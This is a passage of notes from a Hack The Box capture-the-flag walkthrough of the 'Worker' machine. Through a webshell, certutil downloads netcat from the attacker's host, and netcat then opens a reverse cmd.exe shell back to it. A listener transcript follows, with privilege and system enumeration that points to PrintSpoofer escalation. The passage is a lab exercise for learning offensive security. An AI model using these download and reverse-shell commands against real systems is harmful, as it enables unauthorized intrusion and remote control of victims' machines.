7 :80 spectral.worker.htb shell
# saw whoami /priv and systeminfo - we can use PrintSpoofer so getting a cmd shell (instead of PS)
# using webshell
certutil.exe -urlcache -f http://10.10.16.7/nc.exe C:\Users\Public\nc.exe
C:\Users\Public\nc.exe 10.10.16.7 6969 -e cmd.exe
$ nc -lvnp 6969
listening on [any] 6969 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.10.203] 50353
Microsoft Windows [Version 10.0.17763.1282]
(c) 2018 Microsoft Corporation. All rights reserved.
c:\windows\system32\inetsrv>whoami
whoami
iis apppool\defaultapppool
c:\windows\system32\inetsrv>whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
c:\windows\system32\inetsrv>systeminfo
systeminfo
Host Name: WORKER
OS Name: Microsoft Windows Server 2019 Standard
OS Version: 10.0.17763 N/A Build 17763
System Type: x64-based PC
Hotfix(s): 5 Hotfix(s) Installed.
Last updated